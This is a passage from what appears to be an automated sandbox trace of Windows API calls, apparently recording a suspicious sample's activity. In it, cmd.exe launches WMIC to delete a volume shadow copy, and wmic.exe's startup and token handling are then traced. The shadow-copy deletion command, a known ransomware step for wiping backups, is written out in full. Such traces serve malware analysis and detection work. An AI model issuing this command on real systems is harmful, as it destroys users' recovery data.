(Heap=0xc0000, Flags=0x0, Ptr=0xc1320, Size=0x54) returned 0xc1320 [0116.345] GetProcessHeap () returned 0xc0000 [0116.345] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xc1320) returned 0x54 [0116.345] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0116.345] GetProcessHeap () returned 0xc0000 [0116.345] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x48) returned 0xd9ee0 [0116.345] GetProcessHeap () returned 0xc0000 [0116.345] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x7c) returned 0xd9f30 [0116.345] GetProcessHeap () returned 0xc0000 [0116.346] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd9f30, Size=0x48) returned 0xd9f30 [0116.346] GetProcessHeap () returned 0xc0000 [0116.346] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd9f30) returned 0x48 [0116.346] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a04f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.346] GetProcessHeap () returned 0xc0000 [0116.346] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xe8) returned 0xd9f90 [0116.350] GetProcessHeap () returned 0xc0000 [0116.350] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd9f90, Size=0x7e) returned 0xd9f90 [0116.350] GetProcessHeap () returned 0xc0000 [0116.350] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd9f90) returned 0x7e [0116.351] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.351] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x30eff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eff0) returned 0xda020 [0116.351] GetProcessHeap () returned 0xc0000 [0116.351] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x0, Size=0x28) returned 0xd46c0 [0116.351] FindClose (in: hFindFile=0xda020 | out: hFindFile=0xda020) returned 1 [0116.352] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0116.352] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0116.352] GetConsoleTitleW (in: lpConsoleTitle=0x30f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.352] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f2f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f2b8 | out: lpAttributeList=0x30f2f8, lpSize=0x30f2b8) returned 1 [0116.352] UpdateProcThreadAttribute (in: lpAttributeList=0x30f2f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f2f8, lpPreviousValue=0x0) returned 1 [0116.352] GetStartupInfoW (in: lpStartupInfo=0x30f410 | out: lpStartupInfo=0x30f410*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0116.352] GetProcessHeap () returned 0xc0000 [0116.352] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x20) returned 0xd46f0 [0116.352] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0116.352] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0116.352] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0116.352] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0116.352] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0116.352] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0116.352] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0116.352] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0116.353] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0116.354] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0116.354] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0116.354] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0116.354] GetProcessHeap () returned 0xc0000 [0116.354] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd46f0 | out: hHeap=0xc0000) returned 1 [0116.354] GetProcessHeap () returned 0xc0000 [0116.354] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x12) returned 0xd8a30 [0116.354] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0116.355] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x30f330*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f2e0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete", lpProcessInformation=0x30f2e0*(hProcess=0x54, hThread=0x50, dwProcessId=0xa0c, dwThreadId=0x488)) returned 1 [0116.391] CloseHandle (hObject=0x50) returned 1 [0116.391] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0116.391] GetProcessHeap () returned 0xc0000 [0116.391] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdc360 | out: hHeap=0xc0000) returned 1 [0116.391] GetEnvironmentStringsW () returned 0xdad60* [0116.391] GetProcessHeap () returned 0xc0000 [0116.391] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xae8) returned 0xdb850 [0116.391] FreeEnvironmentStringsW (penv=0xdad60) returned 1 [0116.391] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0119.780] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x30f228 | out: lpExitCode=0x30f228*=0x0) returned 1 [0119.780] CloseHandle (hObject=0x54) returned 1 [0119.780] _vsnwprintf (in: _Buffer=0x30f498, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f238 | out: _Buffer="00000000") returned 8 [0119.780] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0119.780] GetProcessHeap () returned 0xc0000 [0119.780] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdb850 | out: hHeap=0xc0000) returned 1 [0119.780] GetEnvironmentStringsW () returned 0xdad60* [0119.780] GetProcessHeap () returned 0xc0000 [0119.780] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xb0e) returned 0xdb880 [0119.780] FreeEnvironmentStringsW (penv=0xdad60) returned 1 [0119.780] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0119.780] GetProcessHeap () returned 0xc0000 [0119.780] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdb880 | out: hHeap=0xc0000) returned 1 [0119.780] GetEnvironmentStringsW () returned 0xdad60* [0119.780] GetProcessHeap () returned 0xc0000 [0119.780] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xb0e) returned 0xdb880 [0119.781] FreeEnvironmentStringsW (penv=0xdad60) returned 1 [0119.781] GetProcessHeap () returned 0xc0000 [0119.781] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd8a30 | out: hHeap=0xc0000) returned 1 [0119.781] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f2f8 | out: lpAttributeList=0x30f2f8) [0119.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.781] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a04e194 | out: lpMode=0x4a04e194) returned 1 [0119.781] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.781] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a04e198 | out: lpMode=0x4a04e198) returned 1 [0119.781] SetConsoleInputExeNameW () returned 0x1 [0119.781] GetConsoleOutputCP () returned 0x1b5 [0119.782] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a05bfe0 | out: lpCPInfo=0x4a05bfe0) returned 1 [0119.782] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0119.782] exit (_Code=0) Process: id = "43" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x1bddb000" os_pid = "0xa0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0xa04" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 231 os_tid = 0x488 [0116.438] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f830 | out: lpSystemTimeAsFileTime=0x12f830*(dwLowDateTime=0x4cf0d430, dwHighDateTime=0x1d68245)) [0116.438] GetCurrentProcessId () returned 0xa0c [0116.438] GetCurrentThreadId () returned 0x488 [0116.438] GetTickCount () returned 0x1152b36 [0116.438] QueryPerformanceCounter (in: lpPerformanceCount=0x12f838 | out: lpPerformanceCount=0x12f838*=23633116401) returned 1 [0116.440] GetModuleHandleW (lpModuleName=0x0) returned 0xff800000 [0116.440] __set_app_type (_Type=0x1) [0116.440] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff84ced0) returned 0x0 [0116.440] __wgetmainargs (in: _Argc=0xff872380, _Argv=0xff872390, _Env=0xff872388, _DoWildCard=0, _StartInfo=0xff87239c | out: _Argc=0xff872380, _Argv=0xff872390, _Env=0xff872388) returned 0 [0116.441] ??0CHString@@QEAA@XZ () returned 0xff872ab0 [0116.441] malloc (_Size=0x30) returned 0x325a50 [0116.441] malloc (_Size=0x70) returned 0x325a90 [0116.441] malloc (_Size=0x50) returned 0x327d30 [0116.441] malloc (_Size=0x30) returned 0x327d90 [0116.441] malloc (_Size=0x48) returned 0x327dd0 [0116.441] malloc (_Size=0x30) returned 0x327e20 [0116.441] malloc (_Size=0x30) returned 0x327e60 [0116.441] ??0CHString@@QEAA@XZ () returned 0xff872f58 [0116.442] malloc (_Size=0x30) returned 0x327ea0 [0116.442] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0116.442] SetConsoleCtrlHandler (HandlerRoutine=0xff845724, Add=1) returned 1 [0116.442] _onexit (_Func=0xff85f378) returned 0xff85f378 [0116.442] _onexit (_Func=0xff85f490) returned 0xff85f490 [0116.442] _onexit (_Func=0xff85f4d0) returned 0xff85f4d0 [0116.442] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.442] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0116.447] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0116.458] CoCreateInstance (in: rclsid=0xff8073a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff807370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff872940 | out: ppv=0xff872940*=0x1c11390) returned 0x0 [0116.467] GetCurrentProcess () returned 0xffffffffffffffff [0116.467] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12f600 | out: TokenHandle=0x12f600*=0xf4) returned 1 [0116.467] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12f5f8 | out: TokenInformation=0x0, ReturnLength=0x12f5f8) returned 0 [0116.467] malloc (_Size=0x118) returned 0x3269a0 [0116.467] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x3269a0, TokenInformationLength=0x118, ReturnLength=0x12f5f8 | out: TokenInformation=0x3269a0, ReturnLength=0x12f5f8) returned 1 [0116.468] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x3269a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=150241438, Attributes=0xdcf0), (Luid.LowPart=0x0, Luid.HighPart=3309280, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0116.468] free (_Block=0x3269a0) [0116.468] CloseHandle (hObject=0xf4) returned 1 [0116.468] malloc (_Size=0x40) returned 0x327ee0 [0116.468] malloc (_Size=0x40) returned 0x327f30 [0116.468] malloc (_Size=0x40) returned 0x327f80 [0116.468] malloc (_Size=0x20a) returned 0x3269a0 [0116.468] GetSystemDirectoryW (in: lpBuffer=0x3269a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.468] free (_Block=0x3269a0) [0116.468] malloc (_Size=0x18) returned 0x33dfb0 [0116.468] malloc (_Size=0x18) returned 0x3269a0 [0116.468] malloc (_Size=0x18) returned 0x3269c0 [0116.468] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0116.468] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0116.469] free (_Block=0x33dfb0) [0116.469] free (_Block=0x3269a0) [0116.469] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0116.469] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0116.469] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.469] FreeLibrary (hLibModule=0x77940000) returned 1 [0116.469] free (_Block=0x3269c0) [0116.469] _vsnwprintf (in: _Buffer=0x327f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x12f228 | out: _Buffer="ms_409") returned 6 [0116.469] malloc (_Size=0x20) returned 0x3269a0 [0116.470] GetComputerNameW (in: lpBuffer=0x3269a0, nSize=0x12f600 | out: lpBuffer="XDUWTFONO", nSize=0x12f600) returned 1 [0116.470] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.470] malloc (_Size=0x14) returned 0x33dfb0 [0116.470] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.470] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x12f5f8 | out: lpNameBuffer=0x0, nSize=0x12f5f8) returned 0x7fffffde000 [0116.471] GetLastError () returned 0xea [0116.471] malloc (_Size=0x40) returned 0x3269d0 [0116.471] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3269d0, nSize=0x12f5f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12f5f8) returned 0x1 [0116.471] lstrlenW (lpString="") returned 0 [0116.471] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.471] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0116.473] lstrlenW (lpString=".") returned 1 [0116.473] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.473] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0116.473] lstrlenW (lpString="LOCALHOST") returned 9 [0116.473] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.473] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0116.473] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.473] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.473] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0116.473] free (_Block=0x33dfb0) [0116.473] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.473] malloc (_Size=0x14) returned 0x33dfb0 [0116.473] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.473] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.473] malloc (_Size=0x14) returned 0x326a20 [0116.473] lstrlenW (lpString="XDUWTFONO") returned 9 [0116.473] malloc (_Size=0x8) returned 0x326a40 [0116.473] malloc (_Size=0x18) returned 0x326a60 [0116.473] malloc (_Size=0x30) returned 0x326a80 [0116.473] malloc (_Size=0x18) returned 0x326ac0 [0116.474] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.474] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.474] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.474] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.474] malloc (_Size=0x30) returned 0x326ae0 [0116.474] malloc (_Size=0x18) returned 0x326b20 [0116.474] SysStringLen (param_1="IMPERSONATE") returned 0xb [0116.474] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.474] SysStringLen (param_1="IMPERSONATE") returned 0xb [0116.474] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.474] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.474] SysStringLen (param_1="IMPERSONATE") returned 0xb [0116.474] malloc (_Size=0x30) returned 0x326b40 [0116.474] malloc (_Size=0x18) returned 0x326b80 [0116.474] SysStringLen (param_1="DELEGATE") returned 0x8 [0116.474] SysStringLen (param_1="IDENTIFY") returned 0x8 [0116.474] SysStringLen (param_1="DELEGATE") returned 0x8 [0116.474] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.474] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0116.474] SysStringLen (param_1="DELEGATE") returned 0x8 [0116.474] malloc (_Size=0x30) returned 0x326ba0 [0116.474] malloc (_Size=0x18) returned 0x326be0 [0116.474] malloc (_Size=0x30) returned 0x326c00 [0116.474] malloc (_Size=0x18) returned 0x326c40 [0116.475] SysStringLen (param_1="NONE") returned 0x4 [0116.475] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.475] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.475] SysStringLen (param_1="NONE") returned 0x4 [0116.475] malloc (_Size=0x30) returned 0x326c60 [0116.475] malloc (_Size=0x18) returned 0x326ca0 [0116.475] SysStringLen (param_1="CONNECT") returned 0x7 [0116.475] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.475] malloc (_Size=0x30) returned 0x326cc0 [0116.475] malloc (_Size=0x18) returned 0x326d00 [0116.475] SysStringLen (param_1="CALL") returned 0x4 [0116.475] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.475] SysStringLen (param_1="CALL") returned 0x4 [0116.475] SysStringLen (param_1="CONNECT") returned 0x7 [0116.475] malloc (_Size=0x30) returned 0x326d20 [0116.475] malloc (_Size=0x18) returned 0x326d60 [0116.475] SysStringLen (param_1="PKT") returned 0x3 [0116.475] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.475] SysStringLen (param_1="PKT") returned 0x3 [0116.475] SysStringLen (param_1="NONE") returned 0x4 [0116.475] SysStringLen (param_1="NONE") returned 0x4 [0116.475] SysStringLen (param_1="PKT") returned 0x3 [0116.475] malloc (_Size=0x30) returned 0x326d80 [0116.475] malloc (_Size=0x18) returned 0x326dc0 [0116.475] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.476] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.476] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.476] SysStringLen (param_1="NONE") returned 0x4 [0116.476] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.476] SysStringLen (param_1="PKT") returned 0x3 [0116.476] SysStringLen (param_1="PKT") returned 0x3 [0116.476] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.476] malloc (_Size=0x30) returned 0x328000 [0116.476] malloc (_Size=0x18) returned 0x326de0 [0116.477] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.477] SysStringLen (param_1="DEFAULT") returned 0x7 [0116.477] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.477] SysStringLen (param_1="PKT") returned 0x3 [0116.477] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.477] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.477] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0116.477] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0116.477] malloc (_Size=0x30) returned 0x328040 [0116.477] malloc (_Size=0x40) returned 0x326e00 [0116.477] malloc (_Size=0x20a) returned 0x326e50 [0116.477] GetSystemDirectoryW (in: lpBuffer=0x326e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.477] free (_Block=0x326e50) [0116.477] malloc (_Size=0x18) returned 0x326e50 [0116.477] malloc (_Size=0x18) returned 0x326e70 [0116.477] malloc (_Size=0x18) returned 0x326e90 [0116.477] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0116.477] SysStringLen (param_1="\\wbem\\") returned 0x6 [0116.478] free (_Block=0x326e50) [0116.478] free (_Block=0x326e70) [0116.478] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0116.478] free (_Block=0x326e90) [0116.478] malloc (_Size=0x18) returned 0x326e50 [0116.478] malloc (_Size=0x18) returned 0x326e70 [0116.478] malloc (_Size=0x18) returned 0x326e90 [0116.478] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0116.478] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0116.478] free (_Block=0x326e50) [0116.478] free (_Block=0x326e70) [0116.478] GetCurrentThreadId () returned 0x488 [0116.479] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x12ef00 | out: phkResult=0x12ef00*=0xf8) returned 0x0 [0116.479] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x12ef50, lpcbData=0x12eef0*=0x400 | out: lpType=0x0, lpData=0x12ef50*=0x30, lpcbData=0x12eef0*=0x4) returned 0x0 [0116.479] _wcsicmp (_String1="0", _String2="1") returned -1 [0116.479] _wcsicmp (_String1="0", _String2="2") returned -2 [0116.479] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x12eef0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x12eef0*=0x42) returned 0x0 [0116.479] malloc (_Size=0x86) returned 0x326eb0 [0116.479] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", 